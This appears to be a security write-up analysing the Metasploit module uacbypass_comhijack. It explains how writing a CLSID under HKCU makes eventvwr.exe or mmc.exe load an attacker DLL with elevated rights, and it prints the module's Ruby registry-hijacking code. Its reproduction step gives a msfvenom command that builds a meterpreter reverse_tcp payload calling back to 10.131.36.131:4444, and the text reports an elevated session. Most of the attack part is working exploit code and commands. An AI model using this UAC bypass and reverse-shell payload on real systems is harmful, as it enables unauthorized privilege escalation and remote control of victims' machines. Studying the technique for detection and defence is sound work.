0x01 COM hijacking principle

The technique exploits the CLSID lookup order:

  1. HKCU\Software\Classes\CLSID
  2. HKCR\CLSID
  3. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\

The hijacked CLSID is written under HKCU\Software\Classes\CLSID, the first location consulted.

CLSID structure

```text
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID
  {CLSID}
    InprocServer32   (Default) = path
                     ThreadingModel = value
```

0x02 Analysis of uacbypass_comhijack

Checking the OS version

```ruby
def check
  # OS version as reported by the meterpreter session; UAC must also be enabled
  if sysinfo['OS'] =~ /Windows (7|8|10|2008|2012|2016)/ && is_uac_enabled?
    Exploit::CheckCode::Appears
  else
    Exploit::CheckCode::Safe
  end
end
```

Hijack points: eventvwr.exe and mmc.exe

```ruby
# Auto-elevating binaries and the CLSIDs they load; both use the same CLSID
@@hijack_points = [
  {
    name: 'Event Viewer',
    cmd_path: '%WINDIR%\System32\eventvwr.exe',
    class_ids: ['0A29FF9E-7F9C-4437-8B11-F424491E3931']
  },
  {
    name: 'Computer Management',
    cmd_path: '%WINDIR%\System32\mmc.exe',
    cmd_args: 'CompMgmt.msc',
    class_ids: ['0A29FF9E-7F9C-4437-8B11-F424491E3931']
  }
]
```

```ruby
# CLSID_PATH and DEFAULT_VAL_NAME are constants defined elsewhere in the module:
# CLSID_PATH is the Software\Classes\CLSID path (written under HKCU) and
# DEFAULT_VAL_NAME names the key's (Default) value.
def hijack_com(registry_view, dll_path)
  # Pick one hijack point and one of its CLSIDs at random
  target = @@hijack_points.sample
  target_clsid = target[:class_ids].sample
  root_key = "#{CLSID_PATH}\\{#{target_clsid}}"
  inproc_key = "#{root_key}\\InProcServer32"
  shell_key = "#{root_key}\\ShellFolder"

  registry_createkey(root_key, registry_view)
  registry_createkey(inproc_key, registry_view)
  registry_createkey(shell_key, registry_view)

  # Register the DLL as the in-process server for the CLSID
  registry_setvaldata(inproc_key, DEFAULT_VAL_NAME, dll_path, 'REG_SZ', registry_view)
  registry_setvaldata(inproc_key, 'ThreadingModel', 'Apartment', 'REG_SZ', registry_view)
  registry_setvaldata(inproc_key, 'LoadWithoutCOM', '', 'REG_SZ', registry_view)
  registry_setvaldata(shell_key, 'HideOnDesktop', '', 'REG_SZ', registry_view)
  registry_setvaldata(shell_key, 'Attributes', 0xf090013d, 'REG_DWORD', registry_view)

  # Return what was hijacked so the caller can launch the target and clean up afterwards
  {
    name: target[:name],
    cmd_path: target[:cmd_path],
    cmd_args: target[:cmd_args],
    root_key: root_key
  }
end
```

Keys added to the registry:

HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InProcServer32
HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\ShellFolder

Under InProcServer32:

  • (Default) -> dll_path
  • ThreadingModel -> Apartment
  • LoadWithoutCOM -> '' (empty string)

Under ShellFolder:

  • HideOnDesktop -> '' (empty string)
  • Attributes -> 0xf090013d

0x03 Reproduction

```sh
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.131.36.131 lport=4444 -f exe > out.exe
```

The payload calls back and we get a meterpreter session.


getsystem fails.


As shown, CLSID {0A29FF9E-7F9C-4437-8B11-F424491E3931} was hijacked and an elevated reverse session was obtained successfully.